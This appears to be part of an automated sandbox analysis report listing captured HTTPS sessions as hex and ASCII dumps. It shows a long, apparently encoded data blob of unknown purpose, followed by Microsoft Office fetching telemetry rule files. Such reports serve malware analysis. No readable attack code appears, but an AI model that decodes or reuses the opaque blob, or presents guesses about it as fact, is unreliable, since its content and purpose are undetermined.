                                                                                                                            2024-11-29 07:30:50 UTC1369INData Raw: 6f 52 54 4f 43 5b 33 50 7b 52 6f 43 6a 53 30 57 31 58 54 62 34 64 6c 53 45 50 56 6d 5b 4c 6f 69 72 56 57 69 4b 5b 33 4b 49 4e 56 34 4b 60 6f 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 73 56 6b 4b 35 65 6d 6d 75 53 6f 4f 51 60 7b 6d 58 57 55 47 56 50 6d 57 73 62 47 4f 56 63 44 47 6f 54 47 4f 42 50 54 75 45 60 7b 65 44 54 56 38 6f 52 54 4f 43 5b 33 5b 53 4c 44 75 44 54 56 38 4e 50 33 6d 43 5b 31 6d 45 50 54 34 45 63 6b 43 4e 50 33 30 60 4c 56 4b 75 55 6b 43 69 57 7b 6d 30 52 54 57 4e 64 57 71 59 53 6b 43 60 54 7b 47 46 58 6d 69 42 4c 46 57 56 54 6c 79 68 56 44 4b 57 56 6d 69 6e 4c 47 4b 75 63 49 4f 60 54 31 48 32 53 47 47 77 5b 31 6d 45 50 56 65 6b 53 31 5b 34 56 57 62 76 5b 31 75 43 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6c 4b 6b 4c 30
                                                                                                                            Data Ascii: oRTOC[3P{RoCjS0W1XTb4dlSEPVm[LoirVWiK[3KINV4K`oONP3mC[1mEPVeKP1GsVkK5emmuSoOQ`{mXWUGVPmWsbGOVcDGoTGOBPTuE`{eDTV8oRTOC[3[SLDuDTV8NP3mC[1mEPT4EckCNP30`LVKuUkCiW{m0RTWNdWqYSkC`T{GFXmiBLFWVTlyhVDKWVminLGKucIO`T1H2SGGw[1mEPVekS1[4VWbv[1uCLDuKP1GoRTOC[1mEPlKkL0
                                                                                                                            2024-11-29 07:30:50 UTC1369INData Raw: 53 6f 4f 68 53 30 5b 73 52 54 65 46 65 57 71 45 50 6c 79 68 63 54 5b 71 58 6a 65 56 60 31 53 53 63 33 75 6a 4c 6c 79 30 56 6a 62 34 4c 33 4c 76 54 6c 79 60 63 57 5b 30 56 6a 65 56 64 54 6d 44 4c 46 65 52 4c 6d 58 76 55 47 5b 6a 65 46 47 57 4e 56 6d 69 63 57 5b 70 5b 44 4f 43 65 47 53 75 53 6f 53 60 56 44 34 32 56 57 65 4e 63 44 6d 45 52 6d 4f 68 4c 6b 6a 76 56 44 5b 4e 63 47 6a 7b 57 6f 6d 69 56 47 48 30 54 55 4b 56 65 56 53 49 57 6f 6d 4f 60 54 6d 6f 55 47 57 4e 62 30 6d 58 55 6f 71 4b 50 31 71 42 58 6c 34 52 62 46 53 75 63 49 6d 6a 56 44 34 53 58 33 31 34 60 33 53 59 55 6b 43 4b 60 54 48 35 52 54 5b 6a 63 30 71 58 52 6c 79 4c 57 55 6d 71 58 56 30 56 60 6c 53 45 50 6b 65 4b 50 30 4b 6c 55 46 30 52 62 46 4c 7b 50 6f 4f 5b 56 46 79 51 56 57 62 79 63 44 6d
                                                                                                                            Data Ascii: SoOhS0[sRTeFeWqEPlyhcT[qXjeV`1SSc3ujLly0Vjb4L3LvTly`cW[0VjeVdTmDLFeRLmXvUG[jeFGWNVmicW[p[DOCeGSuSoS`VD42VWeNcDmERmOhLkjvVD[NcGj{WomiVGH0TUKVeVSIWomO`TmoUGWNb0mXUoqKP1qBXl4RbFSucImjVD4SX314`3SYUkCK`TH5RT[jc0qXRlyLWUmqXV0V`lSEPkeKP0KlUF0RbFL{PoO[VFyQVWbycDm
                                                                                                                            2024-11-29 07:30:50 UTC543INData Raw: 44 69 4a 4c 57 71 55 63 46 53 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 53 6f 53 37 5b 44 69 4a 62 46 4b 75 5b 46 53 4a 53 56 79 30 58 31 69 56 4c 47 4b 75 63 49 4f 60 57 6a 4b 6e 5b 44 65 6f 62 31 53 53 63 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 59 4c 54 4b 6e 58 33 30 46 65 47 71 58 54 6c 79 6b 60 56 69 4e 56 57 62 30 60 30 6d 58 54 6f 5b 6b 63 6c 72 34 52 6a 69 52 64 56 53 59 57 59 43 58 54 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 68 58 7b 4f 52 64 56 47 59 4f 56 34 58 54 30 4b 50 5b 47 69 52 65 33 53 58 54 6a 65 69 57 32 69 72 57 54 65 46 4c 46 47 45 65 31 34 45 5b 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 68 56 56 34 72 4c 47 71 56 4c 46 75 59 53 7b 6d 34 54 7b 4b 56 4f 54 6d 44 4c 46 65 4f 54 55 43 4d
                                                                                                                            Data Ascii: DiJLWqUcFSDTV8oRTOC[1mEPVeKSoS7[DiJbFKu[FSJSVy0X1iVLGKucIO`WjKn[Deob1SSc14E`TGoRTOC[1mEPVeYLTKnX30FeGqXTlyk`ViNVWb0`0mXTo[kclr4RjiRdVSYWYCXTUCMRTOC[1mEPVeKP1KhX{ORdVGYOV4XT0KP[GiRe3SXTjeiW2irWTeFLFGEe14E[{CMRTOC[1mEPVeKP1KhVV4rLGqVLFuYS{m4T{KVOTmDLFeOTUCM
                                                                                                                            2024-11-29 07:30:50 UTC1369INData Raw: 5b 44 65 72 65 6c 4b 71 4e 56 75 60 57 31 34 34 5b 57 69 42 4c 46 47 59 4e 59 57 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 53 30 71 33 58 33 6d 43 63 31 71 49 60 33 65 50 54 31 47 32 55 32 6d 43 60 33 47 55 50 59 53 68 52 47 47 6f 52 6a 65 60 62 46 4b 49 57 6a 4f 6d 56 47 4b 72 58 32 6a 30 55 57 71 59 4f 56 34 6a 53 33 62 32 52 54 4f 52 62 44 75 34 62 32 43 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 54 6c 30 69 57 32 69 72 54 56 34 72 4c 47 71 58 55 6c 4b 4a 53 33 79 6a 52 54 50 76 5b 31 71 49 56 6f 43 68 53 30 5b 45 5b 57 69 52 63 46 4c 79 62 33 75 69 57 6b 43 6f 55 47 65 4a 4f 46 48 7b 52 56 65 4a 53 6c 69 33 58 33 75 31 63 46 57 53 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6b 6d 44 54 56 38
                                                                                                                            Data Ascii: [DerelKqNVu`W144[WiBLFGYNYWDTV8oRTOC[1mEPVeKS0q3X3mCc1qI`3ePT1G2U2mC`3GUPYShRGGoRje`bFKIWjOmVGKrX2j0UWqYOV4jS3b2RTORbDu4b2CKRIONP3mC[1mEPVeKP1GoRTOC[1mETl0iW2irTV4rLGqXUlKJS3yjRTPv[1qIVoChS0[E[WiRcFLyb3uiWkCoUGeJOFH{RVeJSli3X3u1cFWSLDuKP1GoRTOC[1mEPkmDTV8
                                                                                                                            2024-11-29 07:30:50 UTC1369INData Raw: 6f 43 68 53 30 57 6f 54 47 4f 43 60 57 47 37 62 46 4f 56 4c 6c 79 30 56 6a 62 34 4c 33 4c 79 64 47 57 60 57 7b 47 32 56 44 65 60 62 46 4b 49 57 56 6d 51 65 7b 43 4d 53 47 47 77 5b 31 6d 45 50 56 65 6a 4c 6c 69 76 58 6a 65 57 5b 31 75 45 54 6f 6d 60 56 47 4b 34 5b 57 57 4e 65 6c 53 59 4f 55 43 4b 50 7b 47 7b 5b 44 4f 43 60 33 4b 59 53 6b 53 57 63 57 58 76 58 33 30 72 63 46 4f 34 50 59 53 5b 57 7b 57 73 52 54 4c 79 65 56 48 7b 54 56 65 4a 53 30 4b 33 5b 45 48 30 62 33 48 78 53 6c 75 57 4c 30 5b 70 56 55 4b 56 63 47 71 49 57 6c 75 4d 54 31 48 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 69 52 64 56 57 55 50 6b 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 60 6a 6d 47 55 6c 38 60 57 31 34 78 52 54 65 72 63 54 6d 48
                                                                                                                            Data Ascii: oChS0WoTGOC`WG7bFOVLly0Vjb4L3LydGW`W{G2VDe`bFKIWVmQe{CMSGGw[1mEPVejLlivXjeW[1uETom`VGK4[WWNelSYOUCKP{G{[DOC`3KYSkSWcWXvX30rcFO4PYS[W{WsRTLyeVH{TVeJS0K3[EH0b3HxSluWL0[pVUKVcGqIWluMT1H2SGGw[1mEPVeKP1GoRTiRdVWUPkeDTV8oRTOC[1mEPVeKP1GoRTOC`jmGUl8`W14xRTercTmH
                                                                                                                            2024-11-29 07:30:50 UTC1369INData Raw: 65 57 5b 31 79 56 50 6c 69 6a 53 33 69 57 5b 57 69 42 63 44 6d 47 64 46 79 5b 57 30 6d 76 52 54 69 7b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 58 57 65 73 56 6d 69 54 60 30 71 4c 57 56 75 60 57 54 6d 45 52 6a 57 68 4c 33 53 30 58 6a 62 34 60 47 71 45 50 6c 71 68 4c 6b 47 32 58 6a 65 56 4c 47 71 59 54 55 5b 4b 50 30 48 76 56 6d 62 79 65 30 4b 75 63 49 4f 60 54 31 6a 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 6a 65 52 65 6c 50 78 4f 59 4f 68 4c 6a 5b 73 57 55 4f 56 60 6d 6a 78 57 6c 79 60 53 30 5b 73 52 54 50 76 5b 30 44 78 4e 59 57 6a 63 57 5b 34 5b 44 4c 79 53 33 47 59 64 46 79 56 4c 6c 76 76 58 54 5b 6e 65 6c 4f 71 50 59 53 55 57 7b 57 32 5b
                                                                                                                            Data Ascii: eW[1yVPlijS3iW[WiBcDmGdFy[W0mvRTi{UjOqPVeKP1GoRTOC[1mEPVeKP1GoRTOBXWesVmiT`0qLWVu`WTmERjWhL3S0Xjb4`GqEPlqhLkG2XjeVLGqYTU[KP0HvVmbye0KucIO`T1j2SGGw[1mEPVeKP1GoRTOC[1mEPVeKP1GoRjeRelPxOYOhLj[sWUOV`mjxWly`S0[sRTPv[0DxNYWjcW[4[DLyS3GYdFyVLlvvXT[nelOqPYSUW{W2[
                                                                                                                            2024-11-29 07:30:50 UTC1369INData Raw: 6d 57 33 79 30 56 6f 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 62 47 71 71 50 56 38 4c 57 7b 57 33 5b 44 4f 43 60 30 71 49 4e 55 4f 68 63 59 69 33 56 57 65 52 57 46 53 59 55 6c 71 60 57 30 5b 73 56 6d 65 53 62 44 6d 48 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 52 64 57 71 58 54 6f 6d 6d 57 54 34 33 5b 47 62 30 4c 44 75 34 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 65 72 63 54 6d 45 5b 33 75 6b 63 57 58 76 58 33 34 72 53 46 48 7b 57 6f 57 6a 50 31 47 31 58 6a 69 53 5b 31 71 49 4c 56 69 6d 53 6a 71 72 5b 44 69 4a 62 47 71 58 55 59 43 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 69 57 33 75 60 56 47 53 73 56 6a
                                                                                                                            Data Ascii: mW3y0VobvR1mEPVeKP1GoRTOBbGqqPV8LW{W3[DOC`0qINUOhcYi3VWeRWFSYUlq`W0[sVmeSbDmHb14E`TGoRTOC[1mEPVeKP1GoRTORdWqXTommWT43[Gb0LDu4b14E`TGoRTOC[1mEPVeKP1GoRTercTmE[3ukcWXvX34rSFH{WoWjP1G1XjiS[1qILVimSjqr[DiJbGqXUYCKRIONP3mC[1mEPVeKP1GoRTOC[1mEPVeKP1KiW3u`VGSsVj
                                                                                                                            2024-11-29 07:30:50 UTC1369INData Raw: 4c 6d 6a 7b 62 44 6d 68 4c 31 35 76 55 46 30 56 4f 47 71 55 52 55 65 44 54 59 43 69 57 33 75 60 56 47 53 73 56 6a 79 57 60 30 71 57 52 54 4f 4a 60 47 71 49 54 56 65 6a 53 31 5b 37 58 59 6d 4b 4f 31 53 53 63 33 75 5b 57 31 35 76 58 57 62 34 65 54 6d 44 4c 46 65 54 63 57 58 7b 55 47 5b 4e 60 6c 47 49 57 6c 75 6a 57 32 69 72 56 6a 5b 52 60 46 4c 78 65 44 4b 5b 4c 30 4b 76 58 6b 48 31 5b 31 79 57 57 6b 53 60 57 31 35 79 5b 44 65 57 5b 31 6d 73 55 55 5b 58 53 6c 53 76 58 6c 30 52 65 6c 50 7b 55 6c 4f 56 53 30 5b 31 58 31 5b 35 64 6c 53 75 55 6b 5b 55 53 7b 6d 37 5b 44 4c 30 63 46 57 49 57 56 6d 4b 50 7b 47 42 58 33 30 6a 4c 56 4b 59 57 6f 57 6a 50 31 47 71 56 55 4b 46 62 6c 48 78 60 7b 4f 4b 53 32 53 76 58 6c 30 6a 64 6c 4b 59 53 6f 4b 60 56 44 6d 30 56 55 4b
                                                                                                                            Data Ascii: Lmj{bDmhL15vUF0VOGqURUeDTYCiW3u`VGSsVjyW`0qWRTOJ`GqITVejS1[7XYmKO1SSc3u[W15vXWb4eTmDLFeTcWX{UG[N`lGIWlujW2irVj[R`FLxeDK[L0KvXkH1[1yWWkS`W15y[DeW[1msUU[XSlSvXl0RelP{UlOVS0[1X1[5dlSuUk[US{m7[DL0cFWIWVmKP{GBX30jLVKYWoWjP1GqVUKFblHx`{OKS2SvXl0jdlKYSoK`VDm0VUK


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            27192.168.2.54973813.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:49 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:49 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:49 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 469
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                            ETag: "0x8DC582BBA701121"
                                                                                                                            x-ms-request-id: 417b6c53-401e-0029-0d91-3f9b43000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073049Z-174f7845968kvnqxhC1EWRmf3g0000000kb00000000091ka
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:49 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            28192.168.2.54973913.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:49 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:49 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:49 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 415
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                            ETag: "0x8DC582BA41997E3"
                                                                                                                            x-ms-request-id: 106d127d-401e-008c-1a91-3f86c2000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073049Z-174f7845968l4kp6hC1EWRe8840000000zzg0000000001br
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:49 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            29192.168.2.54974113.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:49 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:49 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:49 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 464
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                            ETag: "0x8DC582B97FB6C3C"
                                                                                                                            x-ms-request-id: 44a27185-d01e-0028-1a07-427896000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073049Z-174f7845968n2hr8hC1EWR9cag0000000zb000000000171g
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:49 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            30192.168.2.54974213.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:49 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:50 UTC491INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:49 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 494
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                            ETag: "0x8DC582BB7010D66"
                                                                                                                            x-ms-request-id: 5e69cd2e-d01e-002b-6bff-4125fb000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073049Z-174f7845968zgtf6hC1EWRqd8s0000000spg000000000gr3
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:50 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            31192.168.2.54974413.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:49 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:50 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:50 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 477
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                            ETag: "0x8DC582BB8CEAC16"
                                                                                                                            x-ms-request-id: 7d88711d-b01e-0002-6507-411b8f000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073050Z-174f7845968pght8hC1EWRyvxg00000002w00000000000x5
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:50 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            32192.168.2.54975013.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:51 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:52 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:52 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 472
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                            ETag: "0x8DC582B9DACDF62"
                                                                                                                            x-ms-request-id: b18988de-c01e-0079-2891-3fe51a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073052Z-174f7845968qj8jrhC1EWRh41s0000000zn0000000001vbv
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
